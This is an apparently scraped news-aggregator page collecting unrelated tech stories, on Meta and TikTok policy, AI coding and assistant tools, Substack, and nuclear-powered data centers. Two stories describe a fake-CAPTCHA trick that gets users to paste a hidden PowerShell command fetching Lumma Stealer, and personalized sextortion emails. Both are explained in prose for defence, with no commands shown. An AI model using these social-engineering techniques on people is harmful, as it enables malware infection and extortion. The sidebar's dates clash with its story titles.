On today’s episode of Decoder, we’re diving into an especially messy set of ideas. It’s been a chaotic couple of weeks for big tech companies as the second Trump administration kicks off an unprecedented era of how we think about who controls the internet. Meta’s changed its rules to openly allow more slurs and hate speech on its platforms, TikTok was banned and sort of unbanned, and a bunch of tech CEOs attended the second Trump inauguration.
Technology
Meta’s MAGA heel turn is about much more than Trump
There’s a major collision, or maybe merger, happening right now between billionaire power and state power and everyone who uses tech to communicate — so, basically everyone — meaning everyone is also kind of stuck in the middle.
I invited Kate Klonick, a lawyer as well as an associate professor at St. John’s University School of Law, to try and help me work through the different ways the Trump administration is handling companies like Meta and TikTok — and the very concept of free speech online. As you might have guessed, there are a lot of inconsistencies. But the one thing that unites all of this mess is just how big these companies are and how they’ve drafted the Trump administration into some big geopolitical battles.
Kate just returned to the US after more than a year in Europe studying how those countries are thinking about the internet, and she’s got a lot of thoughts about how these geopolitical conflicts are shaping the present and future of online speech and the internet itself. And these fights are having a real impact on how regular people experience these platforms.
Just a few weeks ago, Mark Zuckerberg made a big announcement about shifting content moderation on Meta platforms — he’s getting rid of fact-checking in favor of crowdsourced community notes, and his new terms of service allow a whole lot of bigoted and transphobic content that used to be at least nominally against the rules.
You can read this as a MAGA heel turn from Zuck, and certainly his new haircut suggests a man approaching middle age grasping to reclaim the confidence of youth. But these moves are also international in scope: the EU’s Digital Services Act imposes some potentially very heavy and expensive regulations on social media platforms, and if Trump likes Zuckerberg and Facebook enough, maybe he’ll go fight Europe on Meta’s behalf.
We don’t need to guess at this — this is very much what Zuckerberg himself is saying he wants out of Trump. Pretty bluntly, Zuckerberg is trading transphobia for a new kind of trade war.
This kind of wheeling and dealing is going to define how tech companies handle Trump 2.0 — here at The Verge, we’re calling it gangster tech regulation, and there’s a lot to unpack. There’s also, bluntly, the Trumpiness of it all — a theory of power that is entirely focused on outcomes and doesn’t pay any attention to the legitimacy or fairness of the process that arrives at those outcomes, which creates huge opportunities for open corruption and, well, dictator shit.
That’s what we’ve seen this week with the TikTok ban, which is another victim of the geopolitical war for control of speech on the internet. Congress passed a law that banned TikTok unless the app was divested of Chinese control, but Trump has simply decided to ignore that law for political gain, even though ignoring the law carries such huge penalties that Apple and Google aren’t taking the risk of having TikTok back on their app stores.
Now, Trump is saying he’ll force a sale and that he wants the US government to own 50 percent of TikTok, an idea so problematic that Kate and I found it hard to even list all the First Amendment issues it would cause.
If you’d like to read more about the stories and topics we discussed in this episode, check out the links below:
- Welcome to the era of gangster tech regulation | The Verge
- Trump signs order refusing to enforce TikTok ban for 75 days | The Verge
- Inside Zuckerberg’s sprint to remake Meta for the Trump era | The New York Times
- The internet’s future is looking bleaker by the day | Wired
- Meta is highlighting a splintering global approach to online speech | The Verge
- Mark Zuckerberg lies about content moderation to Joe Rogan’s face | The Verge
- Meta’s ‘tipping point’ is about aligning with power | The Washington Post
- Meta is preparing for an autocratic future | Tech Policy Press
- Meta surrenders to the right on speech | Platformer
- We’re all trying to find the guy who did this | The Atlantic
Decoder with Nilay Patel /
A podcast from The Verge about big ideas and other problems.
Technology
JetBrains launches Junie, a new AI coding agent for its IDEs
JetBrains, the company behind coding tools like the IntelliJ IDE for Java and Kotlin (and, indeed, the Kotlin language itself), on Thursday launched Junie, a new AI coding agent. This agent, the company says, will be able to handle routine development tasks for when you want to create new applications — and understand the context of existing projects you may want to extend with new features.
Using the well-regarded SWEBench Verified benchmark of 500 common developer tasks, Junie is able to solve 53.6% of them on a single run. Not too long ago, that would have been the top score, but it’s worth noting that at this point, the top-performing models score more than 60%, with Weights & Biases “Programmer O1 crosscheck5” currently leading the pack with a score of 64.6%. JetBrains itself calls Junie’s score “promising.”
But even with a lower score, JetBrains’ service may have an advantage because of its tight integration with the rest of the JetBrains IDE. The company notes that even as Junie helps developers get their work done, the human is always in control, even when delegating tasks to the agent.
“AI-generated code can be just as flawed as developer-written code,” the company writes in the announcement. “Ultimately, Junie will not just speed up development — it is poised to raise the bar for code quality, too. By combining the power of JetBrains IDEs with LLMs, Junie can generate code, run inspections, write tests, and verify they have passed. “
It may be a bit before you can try that out yourself, though. The service is only available through an early access program behind a waitlist. For now, it also only works on Linux and Mac, and in the IntelliJ IDEA Ultimate and PyCharm Professional IDEs, with WebStorm coming soon.
Technology
This devious phishing site repurposes legitimate web elements like CAPTCHA pages for malware distribution
- Phishing campaign mimics CAPTCHA to deliver hidden malware commands
- PowerShell command hidden in verification leads to Lumma Stealer attack
- Educating users on phishing tactics is key to preventing such attacks
CloudSek has uncovered a sophisticated method for distributing the Lumma Stealer malware which poses a serious threat to Windows users.
This technique relies on deceptive human verification pages that trick users into unwittingly executing harmful commands.
While the campaign primarily focuses on spreading the Lumma Stealer malware, its methodology could potentially be adapted to deliver a wide variety of other malicious software.
How the phishing campaign works
The campaign employs trusted platforms such as Amazon S3 and various Content Delivery Networks (CDNs) to host phishing sites, utilizing modular malware delivery where the initial executable downloads additional components or modules, thereby complicating detection and analysis efforts.
The infection chain in this phishing campaign begins with threat actors luring victims to phishing websites that mimic legitimate Google CAPTCHA verification pages. These pages are presented as a necessary identity verification step, tricking users into believing they are completing a standard security check.
The attack takes a more deceptive turn once the user clicks the “Verify” button. Behind the scenes, a hidden JavaScript function activates, copying a base64-encoded PowerShell command onto the user’s clipboard without their knowledge. The phishing page then instructs the user to perform an unusual series of steps, such as opening the Run dialog box (Win+R) and pasting the copied command. These instructions, once followed, cause the PowerShell command to be executed in a hidden window, which is invisible to the user, making detection by the victim almost impossible.
The hidden PowerShell command is the crux of the attack. It connects to a remote server to download additional content such as a text file (a.txt) containing instructions for retrieving and executing the Lumma Stealer malware. Once this malware is installed on the system, it establishes connections with attacker-controlled domains. This allows attackers to compromise the system, steal sensitive data, and potentially launch further malicious activities.
To guard against this phishing campaign, both users and organizations must prioritize security awareness and implement proactive defences. A critical first step is user education.
The deceptive nature of these attacks – disguised as legitimate verification processes – shows the importance of informing users about the dangers of following suspicious prompts, especially when asked to copy and paste unknown commands. Users need to be trained to recognize phishing tactics and question unexpected CAPTCHA verifications or unfamiliar instructions that involve running system commands.
In addition to education, deploying robust endpoint protection is essential for defending against PowerShell-based attacks. Since attackers in this campaign rely heavily on PowerShell to execute malicious code, organizations should ensure that their security solutions are capable of detecting and blocking these activities. Advanced endpoint protection tools with behavioural analysis and real-time monitoring can detect unusual command executions, helping to prevent the malware from being downloaded and installed.
Organizations should also take a proactive approach by monitoring network traffic for suspicious activity. Security teams need to pay close attention to connections with newly registered or uncommon domains, which are often used by attackers to distribute malware or steal sensitive data.
Finally, keeping systems updated with the latest patches is a crucial defense mechanism. Regular updates ensure that known vulnerabilities are addressed, limiting the opportunity for attackers to exploit outdated software in their efforts to distribute malware like Lumma Stealer.
“This new tactic is particularly dangerous because it plays on users’ trust in widely recognized CAPTCHA verifications, which they encounter regularly online. By disguising malicious activity behind what seems like a routine security check, attackers can easily trick users into executing harmful commands on their systems. What’s more concerning is that this technique, currently distributing the Lumma Stealer, could be adapted to spread other types of malware, making it a highly versatile and evolving threat,” said Anshuman Das, Security Researcher at CloudSEK.
You may also like
Technology
The Creators of ‘Palworld’ Are Back—This Time With a Horror Game
Pocketpair, the company behind last year’s viral game Palworld, has a new venture: publishing indie games. Its first project, scheduled for release later this year, will be an as-yet-unnamed horror game from Surgent Studios, the developer behind 2024’s Tales of Kenzera: Zau.
Palworld, jokingly referred to as “Pokémon with guns,” was a breakout success last year, drawing in more than 25 million players in its first few months. The company’s step into publishing comes at a turbulent time for video games, especially smaller studios; last year, Among Us developer Innersloth announced its own move into publishing to help push projects forward. Pocketpair’s Palworld success, it seems, is allowing them to do the same.
“As the games industry continues to grow, more and more games find themselves struggling to get funded or greenlit,” John Buckley, head of Pocketpair Publishing, said in a press release announcing the new division. “We think this is a real shame, because there are so many incredible creators and ideas out there that just need a little help to become incredible games.”
It’s no surprise, then, that Pocketpair would work with Surgent Studios, which has struggled to find funding following the release of Zau. The developer put its team on hiatus last year as it sought a partner for its next Kenzera game, currently known as Project Uso.
Surgent’s deal with Pocketpair is separate from Uso, founder Abubakar Salim tells WIRED. Unlike the Afrofuturism of Zau, it’ll be a horror title meant to introduce players to something new. “We’re taking a little detour from the Tales of Kenzera universe,” Salim says.
Salim adds that the horror genre “is a fascinating space that taps into primal emotions, immersing audiences in a reality that’s removed from their own yet strikes something deep and dark within us all.” Pocketpair and Surgent gave few details about the game in Thursday’s announcement, other than to describe it as “short and weird.”
“The world is so raw right now, and it feels natural to craft an experience that reflects and feeds off that intensity,” Salim says.
Pocketpair Publishing has not announced any other future projects. The company has been embroiled in legal drama since last year, when Nintendo filed a lawsuit in Tokyo claiming Palworld infringed on its copyright. Nintendo did not respond to a request for comment. When asked if the lawsuit was of any concern to Surgent, Salim says the studio isn’t worried. “We’re really excited to be working with their new publishing wing to bring this game to life,” he says.
Technology
Substack is spending $20 million to court TikTokers
Meta and YouTube aren’t the only platforms looking to benefit from TikTok potentially disappearing — Substack wants in on the action, too.
The company announced Thursday it’s launching a $20 million “creator accelerator fund,” promising content creators they won’t lose revenue by jumping ship to Substack. Creators in the program also get “strategic and business support” from Substack, and early access to new features.
“We established this fund because we’ve seen creators who specialize in video, audio, and text expand their audience, revenue, and influence on Substack, where the platform’s network effects amplify the quality and impact of the work they’re doing,” the company said in a blog post.
This pivot on Substack’s part has been in the works for a while — for months, the company has been marketing itself not as a newsletter delivery service but as a creator platform similar to Patreon.
“On Substack, [creators] can build their own home on the internet: one where creators, not platform executives or advertisers, own their work and their audience,” the blog post reads. The post also cites “bans, backlash, and policies that change with the political winds” as a reason creators can’t depend on traditional social media services.
That’s all fine (we at The Verge have been saying this for a while). But creators focusing on Substack are also subject to ebbs and flows depending on what the company is prioritizing: first, it was newsletters, then it was tweet-like micro blogs, followed by full-on websites and livestreaming. For some, Substack’s initial stated mission of giving more freedom to independent writers is fading. And TikTok creators looking to move to Substack will need to rebuild their following all over again — you obviously can’t export your TikTok followers.
The $20 million fund isn’t the first time Substack has offered a pool of money meant to entice creators. Under a program called Substack Pro, the company poached top media talent from traditional newsrooms with higher pay, health insurance, and other perks. That program ended in 2022, with Substack cofounder Hamish McKenzie saying the deals weren’t employment arrangements but “seed funding deals to remove the financial risk for a writer in starting their own business.” In other words, welcome to Substack. Now that you’re here, you’re on your own — which is more or less the deal other platforms offer.
Technology
Anthropic’s new Citations feature aims to reduce AI errors
In an announcement perhaps timed to divert attention away from OpenAI’s Operator, Anthropic Thursday unveiled a new feature for its developer API called Citations, which lets devs “ground” answers from its Claude family of AI in source documents such as emails.
Anthropic says Citations allows its AI models to provide detailed references to “the exact sentences and passages” from docs they use to generate responses. As of Thursday afternoon, Citations is available in both Anthropic’s API and Google’s Vertex AI platform.
As Anthropic explains in a blog post with Citations, devs can add source files to have models automatically cite claims that they inferred from those files. Citations is particularly useful in document summarization, Q&A, and customer support applications, Anthropic says, where the feature can nudge models to insert source citations.
Citations isn’t available for all of Anthropic’s models — only Claude 3.5 Sonnet and Claude 3.5 Haiku. Also, the feature isn’t free. Anthropic notes that Citations may incur charges depending on the length and number of the source documents.
Based on Anthropic’s standard API pricing, which Citations uses, a roughly-100-page source doc would cost around $0.30 with Claude 3.5 Sonnet, or $0.08 with Claude 3.5 Haiku. That may well be worth it for devs looking to cut down on hallucinations and other AI-induced errors.
Technology
New wave of sextortion scams uses personal details and images to intimidate targets while bypassing traditional security measures
- Sextortion scams evolve with personalized tactics and heightened intimidation.
- Threat actors exploit invoicing platforms to bypass email security filters.
- Robust email filters and training help counter sextortion threats effectively.
Sextortion scams are becoming more complex and personal as the scams now frequently target individuals across different sectors with greater precision creating a sense of immediate threat.
Cofense Phish Defense Center (PDC) recently observed a notable evolution in sextortion scams, which unlike earlier versions, which relied primarily on generic scare tactics, now use more sophisticated strategies, often bypassing traditional security measures.
The campaigns now personalize emails, including personal details such as the target’s home address or phone number directly in the email body, in order to capture the recipient’s attention and adds a layer of credibility to the scam.
Exploitation of fear through technical jargon
These emails generally originate from random Gmail accounts, which are harder to trace, rather than the typical impersonated addresses seen in earlier scams.
In addition to personal information, scammers have escalated their approach by including images of the target’s supposed home, workplace, neighbourhood or street in attached PDF files.
The email addresses the recipient by name and provides a specific location, followed by threats of a physical visit if the target fails to comply. This blend of personal details and digital intimidation is a shift from the simpler sextortion scams that used to rely solely on the fear of compromised online privacy.
The scam emails claim that the target’s device has been infected with spyware, often citing “Pegasus” as the malware responsible for the supposed breach. Threat actors use technical jargon to manipulate recipients with the hope that they have a limited understanding of cybersecurity. The emails claim that the attacker has been monitoring the victim for an extended period, gathering sensitive information, and even recording videos of them.
In some cases, the scammer adopts a casual tone lacing the message with slang or compliments to make it seem as if they have been closely observing the target’s life. The message typically concludes with two choices: ignore the email and face public humiliation or pay a ransom in cryptocurrency to ensure the alleged compromising material is never released.
A recurring part of these scams is the demand for payment in Bitcoin or other cryptocurrencies. Scammers often provide a Bitcoin wallet address, sometimes alongside a QR code to facilitate the payment process.
Another notable shift in sextortion campaigns is the use of invoicing services to deliver phishing emails. These services allow threat actors to send emails that bypass certain security protocols by disguising the sender’s information. Since these invoicing platforms handle the email’s delivery, their legitimate headers and content often allow the message to avoid detection.
To combat these evolving scams, individuals and organizations must stay informed and vigilant. Educating users about the nature of sextortion scams and the tactics employed by attackers can reduce the likelihood of falling victim.
You might also like
Technology
Bill Gates’ nuclear energy startup inks new data center deal
TerraPower, a nuclear energy startup founded by Bill Gates, struck a deal this week with one of the largest data center developers in the US to deploy advanced nuclear reactors. TerraPower and Sabey Data Centers (SDC) are working together on a plan to run existing and future facilities on nuclear energy from small reactors.
Tech companies are scrambling to determine where to get all the electricity they’ll need for energy-hungry AI data centers that are putting growing pressure on power grids. They’re increasingly turning to nuclear energy, including next-generation reactors that startups like TerraPower are developing.
“The energy sector is transforming at an unprecedented pace.”
“The energy sector is transforming at an unprecedented pace after decades of business as usual, and meaningful progress will require strategic collaboration across industries,” TerraPower President and CEO Chris Levesque said in a press release.
A memorandum of understanding signed by the two companies establishes a “strategic collaboration” that’ll initially look into the potential for new nuclear power plants in Texas and the Rocky Mountain region that would power SDC’s data centers.
There’s still a long road ahead before that can become a reality. The technology TerraPower and similar nuclear energy startups are developing still have to make it through regulatory hurdles and prove that they can be commercially viable.
Compared to older, larger nuclear power plants, the next generation of reactors are supposed to be smaller and easier to site. Nuclear energy is seen as an alternative to fossil fuels that are causing climate change. But it still faces opposition from some advocates concerned about the impact of uranium mining and storing radioactive waste near communities.
“I’m a big believer that nuclear energy can help us solve the climate problem, which is very, very important. There are designs that, in terms of their safety or fuel use or how they handle waste, I think, minimize those problems,” Gates told The Verge last year.
TerraPower’s reactor design for this collaboration, Natrium, is the only advanced technology of its kind with a construction permit application for a commercial reactor pending with the U.S. Nuclear Regulatory Commission, according to the company. The company just broke ground on a demonstration project in Wyoming last year, and expects it to come online in 2030.
Technology
Threads rolls out a post scheduler, ‘markup’ feature, and more
While Meta lures TikTok creators to Instagram and Facebook with cash bonuses, its X competitor Instagram Threads is now making things easier for creators, brands, and others who need more professional tools to manage their presence on the app. On Thursday, Instagram head Adam Mosseri announced a small handful of new features coming to Threads, including a way to schedule posts and view more metrics within Insights.
In a post on the social network, Mosseri shared that users would now be able to schedule posts on Threads and view the metrics for individual posts within the Insights dashboard which offers a way for Threads users to track trends including their views, number of followers and geographic demographics, number and type of interactions, and more, for a given time period.
In addition, he said that Threads is adding a new feature that allows users to “markup” a post they’re resharing so they include their own creative take. While Mosseri didn’t elaborate on what that means or share an example, earlier findings from tech enthusiast Chris Messina indicate that Threads will add a new icon next to the buttons for adding photos, GIFs, voice, hashtags, and more that provide access to this feature.
The squiggle icon, when clicked, takes users to a screen where they can choose between tools like a highlighter pen or arrow tool, that would allow them to draw directly on a Thread post. This feature was also spotted last week by Lindsey Gamble, who posted on Threads to show the feature in action.
It’s an odd sort of addition for Threads, given that users are more often sharing something clipped from the web, like a news article, where they’ve added a highlight or underline in a screenshot. There hasn’t been much consumer demand for a tool to mark up Threads’ posts directly.
However, the feature does offer Threads users something unique, when compared with social networking rivals like X, Bluesky, and Mastodon — and that could be the point.
Technology
This AI tool helps content creators block unauthorized scraping and manage bot interactions
- Cloudflare AI Audit offers analytics to track and monetize content usage
- Creators regain control with automated tools and fair compensation
- Cloudflare bridges creators and AI firms for balanced content use
As artificial intelligence use cases continue to evolve, there is a growing concern from website owners and content creators over the unauthorized use of their content by AI bots.
Many websites, ranging from large media corporations to small personal blogs, are being scanned by AI models without the creators’ knowledge or compensation, not only affecting businesses but also diminishing the value of online content.
In response to these challenges, Cloudflare has introduced AI Audit, a new suite of tools designed to help content creators manage how their work is accessed by AI bots.
Cloudflare AI Audit
AI models require large data for training and many website owners often find that their contents are being scraped by bots for use in training artificial intelligence systems.
These bots can scan a website multiple times a day, gathering vast amounts of data, but this AI scraping can be overwhelming for content creators, particularly those running small websites or independent blogs.
Without a clear understanding of how their content is being used or the resources to fight back, creators often have little choice but to allow AI models to scrape their work.
Cloudflare’s AI Audit seeks to change that dynamic, giving creators the tools they need to regain control.
For content creators, this practice presents two major concerns including loss of control over their work and the absence of compensation. Content creators may not even be aware of the scale of these activities, as traditional analytics tools do not usually track how AI models interact with their sites.
AI Audit allows creators to manage and block this activity via an easy, automated, and one-click solution to limit unwanted bot interactions. In addition to automated controls, AI Audit offers detailed analytics that give website owners insights into how often their content is being accessed by AI bots. These analytics reveal the types of bots scanning their site, the purpose behind the data collection, and whether attribution is being given when the data is used.
AI Audit also provides advanced metrics that help content creators negotiate fair deals with AI companies. By understanding the rate at which their content is crawled and utilized, creators can ensure they are compensated for their work. This tool also provides standardized terms of use, helping creators safeguard their rights and maintain control over how their content is used in the growing AI landscape.
Cloudflare is also working on a feature that will allow content creators to set fair prices for the right to scan their content. This will be very helpful for those creators who have no idea how the transaction should proceed and will also make it easier for both creators and AI companies to engage in mutually beneficial exchanges.
“AI will dramatically change content online, and we must all decide together what its future will look like,” said Matthew Prince, co-founder and CEO, of Cloudflare.
“Content creators and website owners of all sizes deserve to own and have control over their content. If they don’t, the quality of online information will deteriorate or be locked exclusively behind paywalls.”
You might also like
Technology
Perplexity now has a mobile assistant on Android
Perplexity has turned its AI “answer engine” into a mobile assistant on Android. The new assistant can answer general questions and perform tasks on your behalf, such as writing an email, setting a reminder, booking dinners, and more.
It’s also multimodal, meaning you can ask it questions about what’s on your screen as well as have it open your camera and “see” what’s in front of you. In an example shared by Perplexity, a user asks the assistant to “get me a ride.” Once it learns where the user wants to go, the assistant automatically opens Uber with available rides to that destination.
I tried it out for myself, and it is kind of neat. When I asked it to “open up a good podcast,” my phone started playing the latest episode of The Joe Rogan Experience on YouTube. It worked rather quickly, even though its taste may be questionable.
Using my phone’s camera, Perplexity’s assistant successfully identified the promotional Pokémon pack I got in a McDonald’s Happy Meal (don’t judge), which I found impressive since the promotion only started a couple of days ago. It also helped me write and send a text to a family member using the information in my contacts.
Alongside Samsung’s announcement of the Gemini-equipped Galaxy S25, Google revealed that its AI assistant can now complete tasks across multiple apps, as well as complete multimodal requests.
But Perplexity’s assistant doesn’t work across every app and with every feature. It’s not able to access Slack or Reddit, for example, and I also couldn’t use it to leave a comment on a YouTube video. Right now, the assistant supports Spotify, YouTube, and Uber, along with email, messaging, and clock apps, according to Perplexity spokesperson Sara Platick. “We’re continuing to add support for more apps and more functionality though, so this is just the starting point,” Platnick adds.
You can enable the assistant through the Perplexity app, which prompts you to replace your phone’s default assistant with Perplexity. From there, you can swipe up on the left corner of your screen or hold down your home button to access the assistant.
It’s currently not available on the iPhone, however. “If Apple gives us the right permissions, we’ll make it happen,” Platnick says.
-
Fashion8 years ago
These ’90s fashion trends are making a comeback in 2025
-
Entertainment8 years ago
The Season 9 ‘ Game of Thrones’ is here.
-
Fashion8 years ago
9 spring/summer 2025 fashion trends to know for next season
-
Entertainment8 years ago
The old and New Edition cast comes together to perform You’re Not My Kind of Girl.
-
Sports8 years ago
Ethical Hacker: “I’ll Show You Why Google Has Just Shut Down Their Quantum Chip”
-
Business8 years ago
Uber and Lyft are finally available in all of New York State
-
Entertainment8 years ago
Disney’s live-action Aladdin finally finds its stars
-
Sports8 years ago
Steph Curry finally got the contract he deserves from the Warriors
-
Entertainment8 years ago
Mod turns ‘Counter-Strike’ into a ‘Tekken’ clone with fighting chickens
-
Fashion8 years ago
Your comprehensive guide to this fall’s biggest trends
You must be logged in to post a comment Login